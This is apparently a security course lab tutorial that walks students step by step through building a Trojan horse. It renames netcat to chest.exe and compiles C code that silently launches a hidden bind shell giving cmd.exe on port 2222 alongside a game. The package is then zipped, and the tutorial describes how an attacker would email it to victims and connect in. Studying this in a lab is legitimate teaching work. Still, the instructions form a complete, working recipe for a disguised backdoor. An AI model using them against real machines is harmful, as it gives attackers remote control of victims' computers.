Horse 1: Lesson 2)
{ How to bundle a Trojan
Horse with Netcat }
Section 0. Background
Information |
- Pre-Requisite Lab
- Overview
- This lab demonstrates how easy it is to create
a very simple Trojan Horse.
- Each Christmas my manager sends me this game
called snowcraft.exe. It is a great game in which you are throwing
snowballs at the neighborhood kids.
- Anyway, I am using snowcraft.exe as my Trojan
Horse to hide a Netcat session.
- Legal Disclaimer
- As a condition of your use of this Web
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this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.
- In accordance with UCC � 2-316, this
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- In addition, this is a teaching website
that does not condone malicious behavior of
any kind.
- Your are on notice, that continuing
and/or using this lab outside your "own" test environment is considered
malicious and is against the law.
Section 1. Start Up
Windows Machine |
- Booting up WindowsVulerable01
- Instructions:
- Start up VMware Player
- Select WindowsVulerable01
- Play Virtual Machine
- Note:
- For those of you that are not part of
my class, WindowsVulernable01 is a Windows XP Machine.
- Any version of Windows can be used.

- WindowsVulerable01 Authentication
- Instructions:
- Login as administrator
Section 2. Start up
Internet Explorer |
- Start Up Internet Explorer.
- Instructions:
- On WindowsVulnerable01
- Bring Up Internet Explorer
- Start --> All Programs -->
Internet Explorer

Section 3. Download
Shockwave Prerequisite to view SnowCraft |
- Download Shockwave Player
- Instructions:
- Go To
http://get.adobe.com/shockwave/ In your WindowsVulnerable01's
Internet Explorer.
- Click on Agree and install now.
- Note:
- You can skip this step if you already have
Shockwave Player installed.

- Information Bar
- ActiveX Control
- Instructions:
- Install ActiveX Control...
- Internet Explorer - Security Warning
- Instructions:
- Click Install
- Installing Adobe Shockwave Player
- Instructions:
- Do not check the "Include Norton
Internet Security" checkbox.
- Note: You will be bugged every 30
days to pay for an upgrade.
- Click Next
- Installation Complete
- Note:
- You should see an Installation Complete
Section 4. Download Snowcraft and Netcat |
- Download snowcraft.exe
- Instructions:
- Use your WindowsVulnerable01's Internet
- Click
Here To Download Snowcraft.exe

- Save snowcraft.exe
- Instructions:
- On WindowsVulnerable01
- Navigate to C:\tools
- Create a New Folder
- Instructions:
- Right Click in the white portion of the
- Select New --> Folder

- Name the New Folder
- Instructions:
- Name the folder "snowcraft"
- Double Click on the "snowcraft"
- Create another New Folder
- Instructions:
- Right Click in the white portion of the
- Select New --> Folder

- Name the New Folder
- Instructions:
- Name the folder "dir"
- Double Click on the "dir" directory
- Save snowcraft.exe
- Instructions:
- Make sure you are in C:\tools\snowcraft\dir
- Click the Save button
- Download Complete Message
- Instructions:
- Click Close

- Download netcat.exe
- Instructions:
- Use your WindowsVulnerable01's Internet
- Click
Here To Download netcat.exe

- Saving netcat.exe
- Instructions:
- Navigate to C:\tools\snowcraft\dir
- Click Save

- Download complete
- Instructions:
- Click Open Folder

- Rename netcat.exe
- Instructions:
- Right Click on netcat.exe
- Select Rename
- Rename netcat.exe to chest.exe

- Verify your work
- Instructions:
- In C:\tools\snowcraft\dir
- You should have snowcraft.exe and
chest.exe (f/k/a, netcat.exe)

Section 5. Start up
the CodeBlocks IDE |
- Start up your CodeBlocks IDE
- Instructions:
- Start --> All Programs --> CodeBlocks
--> CodeBlocks

- Create an Empty File
- Instructions:
- File --> New --> Empty file
- Save Empty File
- Instructions:
- File --> Save file as...
- Save file
- Instructions:
- Navigate to C:\tools\snowcraft
- Name the file "snowcraft"
- Click Save

- Cut and Paste Code into the CodeBlocks IDE
- Instructions:
- Highlight the below code
- Right Click --> Copy
- Paste into the CodeBlock Window (See
- Code:
- #include <stdio.h>
#include <stdlib.h>
int main ()
system("start /B dir\\chest.exe -d -L -p 2222 -e cmd.exe");
//return 0;

- Save snowcraft.cpp
- Instructions:
- File --> Save File

- Compile current file
- Instructions:
- Build --> Compile Current file
- Note:
- In the Build log tab, you will see a
Build log message.
- If there are not errors, you will see a
message similar to below, saying you have 0 errors.
- If you received any errors, then you
cannot continue to the next step.

- Build and run
- Instructions:
- Build --> Build and run
- Build and Run Results
- Instructions:
- You should see that Snowcraft was
kicked off
- Play the game if you want.
- When you get bored continue to the next
- Bring up task manager
- Instructions:
- Right click on bottom task bar
- Select Task Manager
- View Task Manager Processes
- Note:
- Notice chest.exe (f/k/a netcat.exe)
- Then are Trojan Horse, snowcraft.exe is
- Open a Command Prompt
- Instruction:
- Start --> All Programs --> Accessories
--> Command Prompt
- Let's investigate chest.exe process
- Instruction:
- tasklist | findstr chest
- tasklist is the command line
equivalent to Windows Task Monitor.
- findstr is like the uniq grep
command, where we are searching for chest.
In my case, the PID that was returned was 1212. In your
case, it will be different.
- netstat -nao | findstr 1212
- netstat is being used to show all
network connections.
- Then findstr search for the
chest.exe PID of 1212.
There is a TCP port listening on 2222.
Section 6. Bundle
Instructions |
- Close out the following applications
- Instructions:
- Close the CodeBlocks IDE
- Close SnowCraft

- Close out the following applications
- Instructions:
- Start --> My Computer
- Navigate to C:\tools\snowcraft
- Delete snowcraft.cpp
- Delete snowcraft.o
- Zip up the snowcraft folder
- Instructions:
- Navigate to C:\tools
- Right Click on the snowcraft folder
- Send To --> Compressed (zipped) folder
- Congratulations
- Note:
- You should see a new file called
- A malicious person might place this
zipped file on their website, and send an email with a web link to
the victim.
- Once the victim, clicks on the link,
their IP address is stored in a web log.
- Then the attacker could possibly attach
to that victim's IP address at port 2222.
- Pretty Scary Stuff!!!
- Open a Command Prompt
- Instruction:
- Start --> All Programs --> Accessories
--> Command Prompt
- Let's investigate chest.exe process
- Instruction:
- tasklist | findstr chest
- netstat -nao | findstr 1212
- date
- echo "Your Name"
- Replace the string "Your Name" with
your actual name.
- E.g., echo "John Gray"
- Instruction:
- Do a PrtScn
- Paste into a word document
- Upload to Moodle.

